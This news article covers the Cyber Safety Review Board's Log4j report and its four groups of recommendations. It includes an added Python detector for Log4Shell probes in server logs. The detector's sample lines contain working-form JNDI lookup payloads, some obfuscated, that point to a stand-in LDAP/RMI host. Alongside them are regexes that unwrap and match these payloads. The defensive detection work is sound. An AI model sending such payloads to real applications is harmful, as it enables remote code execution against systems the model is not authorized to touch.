How to protect against 'endemic' Log4j vulnerabilities


The US Department of Homeland Security has released the Cyber Safety Review Board’s (CSRB) report into Log4j vulnerabilities, which details actionable recommendations for government and industry.

The CSRB is a new public-private initiative within CISA that aims to bring together government and industry leaders to review and assess significant cyber security events and threats.

The board’s first report addresses the “continued risk” posed by the Log4Shell vulnerability in the widely used Log4j open-source software library, discovered in late 2021. It is one of the most prominent cyber security threats of recent years.

Describing Log4Shell as “one of the most serious vulnerabilities discovered in recent years”, the CSRB focuses its recommendations on driving better security in software products and on improving organizations’ ability to respond.

“The CSRB’s first-of-its-kind review has provided us – government and industry alike – with clear, actionable recommendations that DHS will help implement to strengthen our cyber resilience and advance the public-private partnership that is so vital to our collective security,” commented Secretary of Homeland Security Alejandro Mayorkas, who delivered the report to President Biden.

Grappling with the Log4Shell vulnerability

First disclosed on 9 December 2021, Log4Shell is a remote code execution vulnerability in the Log4j 2 Java logging library that was already being exploited as a zero-day when it was published. It carries the maximum CVSS base score of 10.0, and CISA added it to its catalog of known exploited vulnerabilities.

In a nutshell, an attacker supplies a specially crafted string in input the target application is likely to log (a username, an HTTP header, a URL parameter, and so on). Vulnerable versions of Log4j 2 interpret the string as a JNDI lookup, connect to a server the attacker names, and load and execute the code returned. Because the only requirement is that attacker-controlled data reaches a log statement, the attacker needs no credentials and can take full control of the affected system remotely.

The vulnerability was found to have been exploited by coin miners, remote access trojans (RATs), botnets, ransomware operators, and advanced persistent threats (APTs).

According to CISA, cyber threat actors have continued to exploit the vulnerability in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
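Because exploitation depends on a lookup string reaching a log statement, the exploitation attempts that land in web server and application logs have a recognizable shape, and attackers have obfuscated the `${jndi:...}` lookup with nested `${lower:...}` and `${...:-x}` (default-value) lookups to evade naive string matching. The following is an added example, not code from the article or from the CSRB report: a small detector that URL-decodes and de-obfuscates each line before matching. The log lines are constructed for the example, and the obfuscation patterns it unwraps are a minimal set (lower/upper and default-value lookups), not an exhaustive list of every evasion seen in the wild.

```python
"""Detect Log4Shell-style JNDI lookup probes in log lines.

Added example: normalizes the common obfuscations (URL encoding, nested
${lower:x}/${upper:x} lookups, ${...:-x} default-value lookups) and then
looks for a ${jndi:<protocol>:...} lookup. Sample lines are constructed.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample log lines (Apache combined format). Lines 1-3 carry
# JNDI lookup strings in the User-Agent field, line 2 and 3 obfuscated;
# lines 4-5 are benign (line 5 has a non-JNDI lookup, which must not match).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '10.0.0.6 - - [10/Dec/2021:03:15:22 +0000] "GET /login HTTP/1.1" 200 1034 "-" '
    '"${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9/x}"',
    '10.0.0.7 - - [10/Dec/2021:03:16:01 +0000] "POST /api HTTP/1.1" 400 0 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.9/y}"',
    '10.0.0.8 - - [10/Dec/2021:03:17:45 +0000] "GET /static/app.js HTTP/1.1" 200 8851 "-" '
    '"Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:18:10 +0000] "GET /docs?q=${date:yyyy} HTTP/1.1" 200 2210 "-" '
    '"curl/7.79.1"',
]

# ${lower:x} / ${upper:x} -> x  (the whole line is lowercased first, so
# case does not matter). The inner part must not contain another lookup,
# so nested lookups are unwrapped from the inside out by the loop below.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}")
# ${anything:-x} -> x  (default-value syntax; ${::-j} is the common form)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# The actual JNDI lookup once de-obfuscated, with the protocol captured.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(?P<proto>[a-z]+)\s*:[^}]*\}?")

MAX_UNWRAP_PASSES = 20  # guard against pathological nesting


def normalize(line: str) -> str:
    """URL-decode, lowercase and unwrap obfuscating lookups until stable."""
    text = unquote(line).lower()
    for _ in range(MAX_UNWRAP_PASSES):
        unwrapped = _CASE_LOOKUP.sub(r"\1", text)
        unwrapped = _DEFAULT_LOOKUP.sub(r"\1", unwrapped)
        if unwrapped == text:
            break
        text = unwrapped
    return text


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per line that contains a JNDI lookup after normalization."""
    findings: List[Dict[str, object]] = []
    for number, raw in enumerate(lines, start=1):
        normalized = normalize(raw)
        match = JNDI_RE.search(normalized)
        if match:
            findings.append({
                "line": number,
                "protocol": match.group("proto"),
                "lookup": match.group(0),
                "raw": raw,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {finding['line']}: {finding['protocol']} lookup -> {finding['lookup']}")
```

A hit in a web server access log is evidence of an attempt, not of success; the next check is whether the host named in the lookup appears in outbound connection logs or DNS queries from the application server, since the vulnerable application must reach out to that server for the exploit to complete.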

Log4Shell: Recommendations and best practice

The CSRB engaged with nearly 80 organizations and key individuals to gather insights into the Log4j event and develop actionable recommendations for future incidents.

The 19 recommendations outlined in the report have been split into four categories; the first focuses on addressing the continued risks and states that both organizations and government bodies should be prepared to apply vigilance to Log4j vulnerabilities “for the long term”.


The second outlines recommendations for driving best practices for security hygiene, advising adoption of industry-accepted best practices and standards for vulnerability management. That includes investment in security capabilities and development of response programs and practices.

The third category advises organizations on building a better software ecosystem to move to a proactive model of vulnerability management, including increasing investments in open source software security, as well as training software developers in secure software development.

Lastly, the fourth group notes that investing in new systems and institutions for the future will be essential to securing the US's infrastructure and digital resilience in the long term.

“Never before have industry and government cyber leaders come together in this way to review serious incidents, identify what happened, and advise the entire community on how we can do better in the future,” said Robert Silvers, CSRB Chair and DHS Under Secretary for Policy.

“Our review of Log4j produced recommendations that we are confident can drive change and improve cyber security.”

Daniel Todd

Dan is a freelance writer and regular contributor to ChannelPro, covering the latest news stories across the IT, technology, and channel landscapes. Topics regularly cover cloud technologies, cyber security, software and operating system guides, and the latest mergers and acquisitions.

A journalism graduate from Leeds Beckett University, he combines a passion for the written word with a keen interest in the latest technology and its influence in an increasingly connected world.

He started writing for ChannelPro back in 2016, focusing on a mixture of news and technology guides, before becoming a regular contributor to ITPro. Elsewhere, he has previously written news and features across a range of other topics, including sport, music, and general news.